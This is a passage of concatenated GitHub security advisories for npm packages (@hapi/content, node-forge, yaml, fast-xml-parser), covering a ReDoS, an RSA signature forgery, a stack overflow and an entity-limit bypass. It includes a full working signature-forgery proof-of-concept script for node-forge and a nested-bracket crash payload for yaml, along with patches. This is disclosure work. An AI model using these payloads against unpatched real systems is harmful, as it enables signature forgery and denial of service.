"fixed": "6.0.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-35213"
],
"database_specific": {
"cwe_ids": [
"CWE-1333"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-04T04:23:03Z",
"nvd_published_at": "2026-04-06T21:16:20Z",
"severity": "HIGH"
},
"details": "All versions of `@hapi/content` through 6.0.0 are vulnerable to Regular Expression Denial of Service (ReDoS) via crafted HTTP header values. Three regular expressions used to parse `Content-Type` and `Content-Disposition` headers contain patterns susceptible to catastrophic backtracking. This has been fixed in v6.0.1.\n\n### Impact\n\nDenial of Service. An unauthenticated remote attacker can cause a Node.js process to become unresponsive by sending a single HTTP request with a maliciously crafted header value.\n\n### Patches\n\nFixed by tightening all three regular expressions to eliminate backtracking.\n\n### Workarounds\n\nThere are no known workarounds. Upgrade to the patched version.",
"id": "GHSA-jg4p-7fhp-p32p",
"modified": "2026-04-24T13:43:15Z",
"published": "2026-04-04T04:23:03Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/hapijs/content/security/advisories/GHSA-jg4p-7fhp-p32p"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35213"
},
{
"type": "WEB",
"url": "https://github.com/hapijs/content/pull/38"
},
{
"type": "PACKAGE",
"url": "https://github.com/hapijs/content"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "@hapi/content: Regular Expression Denial of Service (ReDoS) in HTTP header parsing"
}
GHSA-PPP5-5V6C-4JWP
Vulnerability from github – Published: 2026-03-26 22:02 – Updated: 2026-03-27 21:50Summary
RSASSA PKCS#1 v1.5 signature verification accepts forged signatures for low public exponent keys (e=3). Attackers can forge signatures by stuffing “garbage” bytes within the ASN structure in order to construct a signature that passes verification, enabling Bleichenbacher style forgery. This issue is similar to CVE-2022-24771, but adds bytes in an addition field within the ASN structure, rather than outside of it.
Additionally, forge does not validate that signatures include a minimum of 8 bytes of padding as defined by the specification, providing attackers additional space to construct Bleichenbacher forgeries.
Impacted Deployments
Tested commit: 8e1d527fe8ec2670499068db783172d4fb9012e5
Affected versions: tested on v1.3.3 (latest release) and recent prior versions.
Configuration assumptions:
- Invoke key.verify with defaults (default scheme uses RSASSA-PKCS1-v1_5).
- _parseAllDigestBytes: true (default setting).
Root Cause
In lib/rsa.js, key.verify(...), forge decrypts the signature block, decodes PKCS#1 v1.5 padding (_decodePkcs1_v1_5), parses ASN.1, and compares capture.digest to the provided digest.
Two issues are present with this logic:
- Strict DER byte-consumption (
_parseAllDigestBytes) only guarantees all bytes are parsed, not that the parsed structure is the canonical minimal DigestInfo shape expected by RFC 8017 verification semantics. A forged EM with attacker-controlled additional ASN.1 content inside the parsed container can still pass forge verification while OpenSSL rejects it. _decodePkcs1_v1_5comments mention that PS < 8 bytes should be rejected, but does not implement this logic.
Reproduction Steps
- Use Node.js (tested with
v24.9.0) and clonedigitalbazaar/forgeat commit8e1d527fe8ec2670499068db783172d4fb9012e5. - Place and run the PoC script (
repro_min.js) withnode repro_min.jsin the same level as theforgefolder. - The script generates a fresh RSA keypair (
4096bits,e=3), creates a normal control signature, then computes a forged candidate using cube-root interval construction. - The script verifies both signatures with:
- forge verify (
_parseAllDigestBytes: true), and - Node/OpenSSL verify (
crypto.verifywithRSA_PKCS1_PADDING). - Confirm output includes:
control-forge-strict: truecontrol-node: trueforgery (forge library, strict): trueforgery (node/OpenSSL): false
Proof of Concept
Overview:
- Demonstrates a valid control signature and a forged signature in one run.
- Uses strict forge parsing mode explicitly (_parseAllDigestBytes: true, also forge default).
- Uses Node/OpenSSL as an differential verification baseline.
- Observed output on tested commit:
control-forge-strict: true
control-node: true
forgery (forge library, strict): true
forgery (node/OpenSSL): false
repro_min.js
#!/usr/bin/env node
'use strict';
const crypto = require('crypto');
const forge = require('./forge/lib/index');
// DER prefix for PKCS#1 v1.5 SHA-256 DigestInfo, without the digest bytes:
// SEQUENCE {
// SEQUENCE { OID sha256, NULL },
// OCTET STRING <32-byte digest>
// }
// Hex: 30 0d 06 09 60 86 48 01 65 03 04 02 01 05 00 04 20
const DIGESTINFO_SHA256_PREFIX = Buffer.from(
'300d060960864801650304020105000420',
'hex'
);
const toBig = b => BigInt('0x' + (b.toString('hex') || '0'));
function toBuf(n, len) {
let h = n.toString(16);
if (h.length % 2) h = '0' + h;
const b = Buffer.from(h, 'hex');
return b.length < len ? Buffer.concat([Buffer.alloc(len - b.length), b]) : b;
}
function cbrtFloor(n) {
let lo = 0n;
let hi = 1n;
while (hi * hi * hi <= n) hi <<= 1n;
while (lo + 1n < hi) {
const mid = (lo + hi) >> 1n;
if (mid * mid * mid <= n) lo = mid;
else hi = mid;
}
return lo;
}
const cbrtCeil = n => {
const f = cbrtFloor(n);
return f * f * f === n ? f : f + 1n;
};
function derLen(len) {
if (len < 0x80) return Buffer.from([len]);
if (len <= 0xff) return Buffer.from([0x81, len]);
return Buffer.from([0x82, (len >> 8) & 0xff, len & 0xff]);
}
function forgeStrictVerify(publicPem, msg, sig) {
const key = forge.pki.publicKeyFromPem(publicPem);
const md = forge.md.sha256.create();
md.update(msg.toString('utf8'), 'utf8');
try {
// verify(digestBytes, signatureBytes, scheme, options):
// - digestBytes: raw SHA-256 digest bytes for `msg`
// - signatureBytes: binary-string representation of the candidate signature
// - scheme: undefined => default RSASSA-PKCS1-v1_5
// - options._parseAllDigestBytes: require DER parser to consume all bytes
// (this is forge's default for verify; set explicitly here for clarity)
return { ok: key.verify(md.digest().getBytes(), sig.toString('binary'), undefined, { _parseAllDigestBytes: true }) };
} catch (err) {
return { ok: false, err: err.message };
}
}
function main() {
const { privateKey, publicKey } = crypto.generateKeyPairSync('rsa', {
modulusLength: 4096,
publicExponent: 3,
privateKeyEncoding: { type: 'pkcs1', format: 'pem' },
publicKeyEncoding: { type: 'pkcs1', format: 'pem' }
});
const jwk = crypto.createPublicKey(publicKey).export({ format: 'jwk' });
const nBytes = Buffer.from(jwk.n, 'base64url');
const n = toBig(nBytes);
const e = toBig(Buffer.from(jwk.e, 'base64url'));
if (e !== 3n) throw new Error('expected e=3');
const msg = Buffer.from('forged-message-0', 'utf8');
const digest = crypto.createHash('sha256').update(msg).digest();
const algAndDigest = Buffer.concat([DIGESTINFO_SHA256_PREFIX, digest]);
// Minimal prefix that forge currently accepts: 00 01 00 + DigestInfo + extra OCTET STRING.
const k = nBytes.length;
// ffCount can be set to any value at or below 111 and produce a valid signature.
// ffCount should be rejected for values below 8, since that would constitute a malformed PKCS1 package.
// However, current versions of node forge do not check for this.
// Rejection of packages with less than 8 bytes of padding is bad but does not constitute a vulnerability by itself.
const ffCount = 0;
// `garbageLen` affects DER length field sizes, which in turn affect how
// many bytes remain for garbage. Iterate to a fixed point so total EM size is exactly `k`.
// A small cap (8) is enough here: DER length-size transitions are discrete
// and few (<128, <=255, <=65535, ...), so this stabilizes quickly.
let garbageLen = 0;
for (let i = 0; i < 8; i += 1) {
const gLenEnc = derLen(garbageLen).length;
const seqLen = algAndDigest.length + 1 + gLenEnc + garbageLen;
const seqLenEnc = derLen(seqLen).length;
const fixed = 2 + ffCount + 1 + 1 + seqLenEnc + algAndDigest.length + 1 + gLenEnc;
const next = k - fixed;
if (next === garbageLen) break;
garbageLen = next;
}
const seqLen = algAndDigest.length + 1 + derLen(garbageLen).length + garbageLen;
const prefix = Buffer.concat([
Buffer.from([0x00, 0x01]),
Buffer.alloc(ffCount, 0xff),
Buffer.from([0x00]),
Buffer.from([0x30]), derLen(seqLen),
algAndDigest,
Buffer.from([0x04]), derLen(garbageLen)
]);
// Build the numeric interval of all EM values that start with `prefix`:
// - `low` = prefix || 00..00
// - `high` = one past (prefix || ff..ff)
// Then find `s` such that s^3 is inside [low, high), so EM has our prefix.
const suffixLen = k - prefix.length;
const low = toBig(Buffer.concat([prefix, Buffer.alloc(suffixLen)]));
const high = low + (1n << BigInt(8 * suffixLen));
const s = cbrtCeil(low);
if (s > cbrtFloor(high - 1n) || s >= n) throw new Error('no candidate in interval');
const sig = toBuf(s, k);
const controlMsg = Buffer.from('control-message', 'utf8');
const controlSig = crypto.sign('sha256', controlMsg, {
key: privateKey,
padding: crypto.constants.RSA_PKCS1_PADDING
});
// forge verification calls (library under test)
const controlForge = forgeStrictVerify(publicKey, controlMsg, controlSig);
const forgedForge = forgeStrictVerify(publicKey, msg, sig);
// Node.js verification calls (OpenSSL-backed reference behavior)
const controlNode = crypto.verify('sha256', controlMsg, {
key: publicKey,
padding: crypto.constants.RSA_PKCS1_PADDING
}, controlSig);
const forgedNode = crypto.verify('sha256', msg, {
key: publicKey,
padding: crypto.constants.RSA_PKCS1_PADDING
}, sig);
console.log('control-forge-strict:', controlForge.ok, controlForge.err || '');
console.log('control-node:', controlNode);
console.log('forgery (forge library, strict):', forgedForge.ok, forgedForge.err || '');
console.log('forgery (node/OpenSSL):', forgedNode);
}
main();
Suggested Patch
- Enforce PKCS#1 v1.5 BT=0x01 minimum padding length (
PS >= 8) in_decodePkcs1_v1_5before accepting the block. - Update the RSASSA-PKCS1-v1_5 verifier to require canonical DigestInfo structure only (no extra attacker-controlled ASN.1 content beyond expected fields).
Here is a Forge-tested patch to resolve the issue, though it should be verified for consumer projects:
index b207a63..ec8a9c1 100644
--- a/lib/rsa.js
+++ b/lib/rsa.js
@@ -1171,6 +1171,14 @@ pki.setRsaPublicKey = pki.rsa.setPublicKey = function(n, e) {
error.errors = errors;
throw error;
}
+
+ if(obj.value.length != 2) {
+ var error = new Error(
+ 'DigestInfo ASN.1 object must contain exactly 2 fields for ' +
+ 'a valid RSASSA-PKCS1-v1_5 package.');
+ error.errors = errors;
+ throw error;
+ }
// check hash algorithm identifier
// see PKCS1-v1-5DigestAlgorithms in RFC 8017
// FIXME: add support to validator for strict value choices
@@ -1673,6 +1681,10 @@ function _decodePkcs1_v1_5(em, key, pub, ml) {
}
++padNum;
}
+
+ if (padNum < 8) {
+ throw new Error('Encryption block is invalid.');
+ }
} else if(bt === 0x02) {
// look for 0x00 byte
padNum = 0;
Resources
- RFC 2313 (PKCS v1.5): https://datatracker.ietf.org/doc/html/rfc2313#section-8
-
This limitation guarantees that the length of the padding string PS is at least eight octets, which is a security condition.
- RFC 8017: https://www.rfc-editor.org/rfc/rfc8017.html
lib/rsa.jskey.verify(...)at lines ~1139-1223.lib/rsa.js_decodePkcs1_v1_5(...)at lines ~1632-1695.
Credit
This vulnerability was discovered as part of a U.C. Berkeley security research project by: Austin Chu, Sohee Kim, and Corban Villa.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "node-forge"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.4.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-33894"
],
"database_specific": {
"cwe_ids": [
"CWE-20",
"CWE-347"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-26T22:02:35Z",
"nvd_published_at": "2026-03-27T21:17:25Z",
"severity": "HIGH"
},
"details": "## Summary\nRSASSA PKCS#1 v1.5 signature verification accepts forged signatures for low public exponent keys (e=3). Attackers can forge signatures by stuffing \u201cgarbage\u201d bytes within the ASN structure in order to construct a signature that passes verification, enabling [Bleichenbacher style forgery](https://mailarchive.ietf.org/arch/msg/openpgp/5rnE9ZRN1AokBVj3VqblGlP63QE/). This issue is similar to [CVE-2022-24771](https://github.com/digitalbazaar/forge/security/advisories/GHSA-cfm4-qjh2-4765), but adds bytes in an addition field within the ASN structure, rather than outside of it. \n\nAdditionally, forge does not validate that signatures include a minimum of 8 bytes of padding as [defined by the specification](https://datatracker.ietf.org/doc/html/rfc2313#section-8), providing attackers additional space to construct Bleichenbacher forgeries. \n\n## Impacted Deployments\n**Tested commit:** `8e1d527fe8ec2670499068db783172d4fb9012e5`\n**Affected versions:** tested on v1.3.3 (latest release) and recent prior versions.\n\n**Configuration assumptions:**\n- Invoke key.verify with defaults (default `scheme` uses RSASSA-PKCS1-v1_5).\n- `_parseAllDigestBytes: true` (default setting).\n\n## Root Cause\n\nIn `lib/rsa.js`, `key.verify(...)`, forge decrypts the signature block, decodes PKCS#1 v1.5 padding (`_decodePkcs1_v1_5`), parses ASN.1, and compares `capture.digest` to the provided digest.\n\nTwo issues are present with this logic:\n\n1. Strict DER byte-consumption (`_parseAllDigestBytes`) only guarantees all bytes are parsed, not that the parsed structure is the canonical minimal DigestInfo shape expected by RFC 8017 verification semantics. A forged EM with attacker-controlled additional ASN.1 content inside the parsed container can still pass forge verification while OpenSSL rejects it.\n2. `_decodePkcs1_v1_5` comments mention that PS \u003c 8 bytes should be rejected, but does not implement this logic.\n\n## Reproduction Steps\n1. Use Node.js (tested with `v24.9.0`) and clone `digitalbazaar/forge` at commit `8e1d527fe8ec2670499068db783172d4fb9012e5`.\n4. Place and run the PoC script (`repro_min.js`) with `node repro_min.js` in the same level as the `forge` folder.\n5. The script generates a fresh RSA keypair (`4096` bits, `e=3`), creates a normal control signature, then computes a forged candidate using cube-root interval construction.\n6. The script verifies both signatures with:\n - forge verify (`_parseAllDigestBytes: true`), and\n - Node/OpenSSL verify (`crypto.verify` with `RSA_PKCS1_PADDING`).\n7. Confirm output includes:\n - `control-forge-strict: true`\n - `control-node: true`\n - `forgery (forge library, strict): true`\n - `forgery (node/OpenSSL): false`\n\n## Proof of Concept\n\n**Overview:**\n- Demonstrates a valid control signature and a forged signature in one run.\n- Uses strict forge parsing mode explicitly (`_parseAllDigestBytes: true`, also forge default).\n- Uses Node/OpenSSL as an differential verification baseline.\n- Observed output on tested commit:\n\n```text\ncontrol-forge-strict: true\ncontrol-node: true\nforgery (forge library, strict): true\nforgery (node/OpenSSL): false\n```\n\n\u003cdetails\u003e\u003csummary\u003erepro_min.js\u003c/summary\u003e\n\n```javascript\n#!/usr/bin/env node\n\u0027use strict\u0027;\n\nconst crypto = require(\u0027crypto\u0027);\nconst forge = require(\u0027./forge/lib/index\u0027);\n\n// DER prefix for PKCS#1 v1.5 SHA-256 DigestInfo, without the digest bytes:\n// SEQUENCE {\n// SEQUENCE { OID sha256, NULL },\n// OCTET STRING \u003c32-byte digest\u003e\n// }\n// Hex: 30 0d 06 09 60 86 48 01 65 03 04 02 01 05 00 04 20\nconst DIGESTINFO_SHA256_PREFIX = Buffer.from(\n \u0027300d060960864801650304020105000420\u0027,\n \u0027hex\u0027\n);\n\nconst toBig = b =\u003e BigInt(\u00270x\u0027 + (b.toString(\u0027hex\u0027) || \u00270\u0027));\nfunction toBuf(n, len) {\n let h = n.toString(16);\n if (h.length % 2) h = \u00270\u0027 + h;\n const b = Buffer.from(h, \u0027hex\u0027);\n return b.length \u003c len ? Buffer.concat([Buffer.alloc(len - b.length), b]) : b;\n}\nfunction cbrtFloor(n) {\n let lo = 0n;\n let hi = 1n;\n while (hi * hi * hi \u003c= n) hi \u003c\u003c= 1n;\n while (lo + 1n \u003c hi) {\n const mid = (lo + hi) \u003e\u003e 1n;\n if (mid * mid * mid \u003c= n) lo = mid;\n else hi = mid;\n }\n return lo;\n}\nconst cbrtCeil = n =\u003e {\n const f = cbrtFloor(n);\n return f * f * f === n ? f : f + 1n;\n};\nfunction derLen(len) {\n if (len \u003c 0x80) return Buffer.from([len]);\n if (len \u003c= 0xff) return Buffer.from([0x81, len]);\n return Buffer.from([0x82, (len \u003e\u003e 8) \u0026 0xff, len \u0026 0xff]);\n}\n\nfunction forgeStrictVerify(publicPem, msg, sig) {\n const key = forge.pki.publicKeyFromPem(publicPem);\n const md = forge.md.sha256.create();\n md.update(msg.toString(\u0027utf8\u0027), \u0027utf8\u0027);\n try {\n // verify(digestBytes, signatureBytes, scheme, options):\n // - digestBytes: raw SHA-256 digest bytes for `msg`\n // - signatureBytes: binary-string representation of the candidate signature\n // - scheme: undefined =\u003e default RSASSA-PKCS1-v1_5\n // - options._parseAllDigestBytes: require DER parser to consume all bytes\n // (this is forge\u0027s default for verify; set explicitly here for clarity)\n return { ok: key.verify(md.digest().getBytes(), sig.toString(\u0027binary\u0027), undefined, { _parseAllDigestBytes: true }) };\n } catch (err) {\n return { ok: false, err: err.message };\n }\n}\n\nfunction main() {\n const { privateKey, publicKey } = crypto.generateKeyPairSync(\u0027rsa\u0027, {\n modulusLength: 4096,\n publicExponent: 3,\n privateKeyEncoding: { type: \u0027pkcs1\u0027, format: \u0027pem\u0027 },\n publicKeyEncoding: { type: \u0027pkcs1\u0027, format: \u0027pem\u0027 }\n });\n\n const jwk = crypto.createPublicKey(publicKey).export({ format: \u0027jwk\u0027 });\n const nBytes = Buffer.from(jwk.n, \u0027base64url\u0027);\n const n = toBig(nBytes);\n const e = toBig(Buffer.from(jwk.e, \u0027base64url\u0027));\n if (e !== 3n) throw new Error(\u0027expected e=3\u0027);\n\n const msg = Buffer.from(\u0027forged-message-0\u0027, \u0027utf8\u0027);\n const digest = crypto.createHash(\u0027sha256\u0027).update(msg).digest();\n const algAndDigest = Buffer.concat([DIGESTINFO_SHA256_PREFIX, digest]);\n\n // Minimal prefix that forge currently accepts: 00 01 00 + DigestInfo + extra OCTET STRING.\n const k = nBytes.length;\n // ffCount can be set to any value at or below 111 and produce a valid signature.\n // ffCount should be rejected for values below 8, since that would constitute a malformed PKCS1 package.\n // However, current versions of node forge do not check for this.\n // Rejection of packages with less than 8 bytes of padding is bad but does not constitute a vulnerability by itself.\n const ffCount = 0; \n // `garbageLen` affects DER length field sizes, which in turn affect how\n // many bytes remain for garbage. Iterate to a fixed point so total EM size is exactly `k`.\n // A small cap (8) is enough here: DER length-size transitions are discrete\n // and few (\u003c128, \u003c=255, \u003c=65535, ...), so this stabilizes quickly.\n let garbageLen = 0;\n for (let i = 0; i \u003c 8; i += 1) {\n const gLenEnc = derLen(garbageLen).length;\n const seqLen = algAndDigest.length + 1 + gLenEnc + garbageLen;\n const seqLenEnc = derLen(seqLen).length;\n const fixed = 2 + ffCount + 1 + 1 + seqLenEnc + algAndDigest.length + 1 + gLenEnc;\n const next = k - fixed;\n if (next === garbageLen) break;\n garbageLen = next;\n }\n const seqLen = algAndDigest.length + 1 + derLen(garbageLen).length + garbageLen;\n const prefix = Buffer.concat([\n Buffer.from([0x00, 0x01]),\n Buffer.alloc(ffCount, 0xff),\n Buffer.from([0x00]),\n Buffer.from([0x30]), derLen(seqLen),\n algAndDigest,\n Buffer.from([0x04]), derLen(garbageLen)\n ]);\n\n // Build the numeric interval of all EM values that start with `prefix`:\n // - `low` = prefix || 00..00\n // - `high` = one past (prefix || ff..ff)\n // Then find `s` such that s^3 is inside [low, high), so EM has our prefix.\n const suffixLen = k - prefix.length;\n const low = toBig(Buffer.concat([prefix, Buffer.alloc(suffixLen)]));\n const high = low + (1n \u003c\u003c BigInt(8 * suffixLen));\n const s = cbrtCeil(low);\n if (s \u003e cbrtFloor(high - 1n) || s \u003e= n) throw new Error(\u0027no candidate in interval\u0027);\n\n const sig = toBuf(s, k);\n\n const controlMsg = Buffer.from(\u0027control-message\u0027, \u0027utf8\u0027);\n const controlSig = crypto.sign(\u0027sha256\u0027, controlMsg, {\n key: privateKey,\n padding: crypto.constants.RSA_PKCS1_PADDING\n });\n\n // forge verification calls (library under test)\n const controlForge = forgeStrictVerify(publicKey, controlMsg, controlSig);\n const forgedForge = forgeStrictVerify(publicKey, msg, sig);\n\n // Node.js verification calls (OpenSSL-backed reference behavior)\n const controlNode = crypto.verify(\u0027sha256\u0027, controlMsg, {\n key: publicKey,\n padding: crypto.constants.RSA_PKCS1_PADDING\n }, controlSig);\n const forgedNode = crypto.verify(\u0027sha256\u0027, msg, {\n key: publicKey,\n padding: crypto.constants.RSA_PKCS1_PADDING\n }, sig);\n\n console.log(\u0027control-forge-strict:\u0027, controlForge.ok, controlForge.err || \u0027\u0027);\n console.log(\u0027control-node:\u0027, controlNode);\n console.log(\u0027forgery (forge library, strict):\u0027, forgedForge.ok, forgedForge.err || \u0027\u0027);\n console.log(\u0027forgery (node/OpenSSL):\u0027, forgedNode);\n}\n\nmain();\n```\n\u003c/details\u003e\n\n## Suggested Patch\n- Enforce PKCS#1 v1.5 BT=0x01 minimum padding length (`PS \u003e= 8`) in `_decodePkcs1_v1_5` before accepting the block.\n- Update the RSASSA-PKCS1-v1_5 verifier to require canonical DigestInfo structure only (no extra attacker-controlled ASN.1 content beyond expected fields).\n\nHere is a Forge-tested patch to resolve the issue, though it should be verified for consumer projects:\n\n```diff\nindex b207a63..ec8a9c1 100644\n--- a/lib/rsa.js\n+++ b/lib/rsa.js\n@@ -1171,6 +1171,14 @@ pki.setRsaPublicKey = pki.rsa.setPublicKey = function(n, e) {\n error.errors = errors;\n throw error;\n }\n+\n+ if(obj.value.length != 2) {\n+ var error = new Error(\n+ \u0027DigestInfo ASN.1 object must contain exactly 2 fields for \u0027 +\n+ \u0027a valid RSASSA-PKCS1-v1_5 package.\u0027);\n+ error.errors = errors;\n+ throw error;\n+ }\n // check hash algorithm identifier\n // see PKCS1-v1-5DigestAlgorithms in RFC 8017\n // FIXME: add support to validator for strict value choices\n@@ -1673,6 +1681,10 @@ function _decodePkcs1_v1_5(em, key, pub, ml) {\n }\n ++padNum;\n }\n+\n+ if (padNum \u003c 8) {\n+ throw new Error(\u0027Encryption block is invalid.\u0027);\n+ }\n } else if(bt === 0x02) {\n // look for 0x00 byte\n padNum = 0;\n```\n## Resources\n- RFC 2313 (PKCS v1.5): https://datatracker.ietf.org/doc/html/rfc2313#section-8\n - \u003e This limitation guarantees that the length of the padding string PS is at least eight octets, which is a security condition. \n- RFC 8017: https://www.rfc-editor.org/rfc/rfc8017.html\n- `lib/rsa.js` `key.verify(...)` at lines ~1139-1223.\n- `lib/rsa.js` `_decodePkcs1_v1_5(...)` at lines ~1632-1695.\n\n## Credit\n\nThis vulnerability was discovered as part of a U.C. Berkeley security research project by: Austin Chu, Sohee Kim, and Corban Villa.",
"id": "GHSA-ppp5-5v6c-4jwp",
"modified": "2026-03-27T21:50:55Z",
"published": "2026-03-26T22:02:35Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-cfm4-qjh2-4765"
},
{
"type": "WEB",
"url": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-ppp5-5v6c-4jwp"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33894"
},
{
"type": "WEB",
"url": "https://datatracker.ietf.org/doc/html/rfc2313#section-8"
},
{
"type": "PACKAGE",
"url": "https://github.com/digitalbazaar/forge"
},
{
"type": "WEB",
"url": "https://mailarchive.ietf.org/arch/msg/openpgp/5rnE9ZRN1AokBVj3VqblGlP63QE"
},
{
"type": "WEB",
"url": "https://www.rfc-editor.org/rfc/rfc8017.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "Forge has signature forgery in RSA-PKCS due to ASN.1 extra field "
}
GHSA-48C2-RRV3-QJMP
Vulnerability from github – Published: 2026-03-25 20:08 – Updated: 2026-03-27 21:34Parsing a YAML document with yaml may throw a RangeError due to a stack overflow.
The node resolution/composition phase uses recursive function calls without a depth bound. An attacker who can supply YAML for parsing can trigger a RangeError: Maximum call stack size exceeded with a small payload (~2–10 KB). The RangeError is not a YAMLParseError, so applications that only catch YAML-specific errors will encounter an unexpected exception type. Depending on the host application's exception handling, this can fail requests or terminate the Node.js process.
Flow sequences allow deep nesting with minimal bytes (2 bytes per level: one [ and one ]). On the default Node.js stack, approximately 1,000–5,000 levels of nesting (2–10 KB input) exhaust the call stack. The exact threshold is environment-dependent (Node.js version, stack size, call stack depth at invocation).
Note: the library's Parser (CST phase) uses a stack-based iterative approach and is not affected. Only the compose/resolve phase uses actual call-stack recursion.
All three public parsing APIs are affected: YAML.parse(), YAML.parseDocument(), and YAML.parseAllDocuments().
PoC
const YAML = require('yaml');
// ~10 KB payload: 5000 levels of nested flow sequences
const payload = '['.repeat(5000) + '1' + ']'.repeat(5000);
try {
YAML.parse(payload);
} catch (e) {
console.log(e.constructor.name); // RangeError (NOT YAMLParseError)
console.log(e.message); // Maximum call stack size exceeded
}
Test environment: Node.js v24.12.0, macOS darwin arm64
| Version | Nesting Depth | Input Size | Result |
|---|---|---|---|
| 1.0.0 | 5,000 | 10,001 B | RangeError |
| 1.10.2 | 5,000 | 10,001 B | RangeError |
| 2.0.0 | 5,000 | 10,001 B | RangeError |
| 2.8.2 | 5,000 | 10,001 B | RangeError |
| 2.8.3 | 5,000 | 10,001 B | YAMLParseError |
Depth threshold on yaml 2.8.2:
| Nesting Depth | Input Size | Result |
|---|---|---|
| 500 | 1,001 B | Parses successfully |
| 1,000 | 2,001 B | RangeError (threshold varies by stack size) |
| 5,000 | 10,001 B | RangeError |
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "yaml"
},
"ranges": [
{
"events": [
{
"introduced": "2.0.0"
},
{
"fixed": "2.8.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "yaml"
},
"ranges": [
{
"events": [
{
"introduced": "1.0.0"
},
{
"fixed": "1.10.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-33532"
],
"database_specific": {
"cwe_ids": [
"CWE-674"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-25T20:08:24Z",
"nvd_published_at": "2026-03-26T20:16:15Z",
"severity": "MODERATE"
},
"details": "Parsing a YAML document with `yaml` may throw a RangeError due to a stack overflow.\n\nThe node resolution/composition phase uses recursive function calls without a depth bound. An attacker who can supply YAML for parsing can trigger a `RangeError: Maximum call stack size exceeded` with a small payload (~2\u201310 KB). The `RangeError` is not a `YAMLParseError`, so applications that only catch YAML-specific errors will encounter an unexpected exception type. Depending on the host application\u0027s exception handling, this can fail requests or terminate the Node.js process.\n\nFlow sequences allow deep nesting with minimal bytes (2 bytes per level: one `[` and one `]`). On the default Node.js stack, approximately 1,000\u20135,000 levels of nesting (2\u201310 KB input) exhaust the call stack. The exact threshold is environment-dependent (Node.js version, stack size, call stack depth at invocation).\n\nNote: the library\u0027s `Parser` (CST phase) uses a stack-based iterative approach and is not affected. Only the compose/resolve phase uses actual call-stack recursion.\n\nAll three public parsing APIs are affected: `YAML.parse()`, `YAML.parseDocument()`, and `YAML.parseAllDocuments()`.\n\n### PoC\n\n```javascript\nconst YAML = require(\u0027yaml\u0027);\n\n// ~10 KB payload: 5000 levels of nested flow sequences\nconst payload = \u0027[\u0027.repeat(5000) + \u00271\u0027 + \u0027]\u0027.repeat(5000);\n\ntry {\n YAML.parse(payload);\n} catch (e) {\n console.log(e.constructor.name); // RangeError (NOT YAMLParseError)\n console.log(e.message); // Maximum call stack size exceeded\n}\n```\n\nTest environment: Node.js v24.12.0, macOS darwin arm64\n\n| Version | Nesting Depth | Input Size | Result |\n|---|---|---|---|\n| 1.0.0 | 5,000 | 10,001 B | RangeError |\n| 1.10.2 | 5,000 | 10,001 B | RangeError |\n| 2.0.0 | 5,000 | 10,001 B | RangeError |\n| 2.8.2 | 5,000 | 10,001 B | RangeError |\n| 2.8.3 | 5,000 | 10,001 B | YAMLParseError |\n\nDepth threshold on yaml 2.8.2:\n\n| Nesting Depth | Input Size | Result |\n|---|---|---|\n| 500 | 1,001 B | Parses successfully |\n| 1,000 | 2,001 B | RangeError (threshold varies by stack size) |\n| 5,000 | 10,001 B | RangeError |",
"id": "GHSA-48c2-rrv3-qjmp",
"modified": "2026-03-27T21:34:51Z",
"published": "2026-03-25T20:08:24Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/eemeli/yaml/security/advisories/GHSA-48c2-rrv3-qjmp"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33532"
},
{
"type": "WEB",
"url": "https://github.com/eemeli/yaml/commit/1e84ebbea7ec35011a4c61bbb820a529ee4f359b"
},
{
"type": "PACKAGE",
"url": "https://github.com/eemeli/yaml"
},
{
"type": "WEB",
"url": "https://github.com/eemeli/yaml/releases/tag/v1.10.3"
},
{
"type": "WEB",
"url": "https://github.com/eemeli/yaml/releases/tag/v2.8.3"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"type": "CVSS_V3"
}
],
"summary": "yaml is vulnerable to Stack Overflow via deeply nested YAML collections"
}
GHSA-JP2Q-39XQ-3W4G
Vulnerability from github – Published: 2026-03-19 19:13 – Updated: 2026-04-08 22:27Summary
The DocTypeReader in fast-xml-parser uses JavaScript truthy checks to evaluate maxEntityCount and maxEntitySize configuration limits. When a developer explicitly sets either limit to 0 — intending to disallow all entities or restrict entity size to zero bytes — the falsy nature of 0 in JavaScript causes the guard conditions to short-circuit, completely bypassing the limits. An attacker who can supply XML input to such an application can trigger unbounded entity expansion, leading to memory exhaustion and denial of service.
Details
The OptionsBuilder.js correctly preserves a user-supplied value of 0 using nullish coalescing (??):
// src/xmlparser/OptionsBuilder.js:111
maxEntityCount: value.maxEntityCount ?? 100,
// src/xmlparser/OptionsBuilder.js:107
maxEntitySize: value.maxEntitySize ?? 10000,
However, DocTypeReader.js uses truthy evaluation to check these limits. Because 0 is falsy in JavaScript, the entire guard expression short-circuits to false, and the limit is never enforced:
// src/xmlparser/DocTypeReader.js:30-32
if (this.options.enabled !== false &&
